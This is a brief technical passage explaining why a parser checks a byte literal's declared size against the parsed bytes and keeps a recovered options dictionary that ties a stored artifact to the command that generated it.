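Checking the declared size against the parsed bytes catches the common copy-and-paste failure where a line of the literal is lost; the recovered options dictionary records how the bytes were generated, which is what an analyst needs to tie a stored artifact back to the command that produced it.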
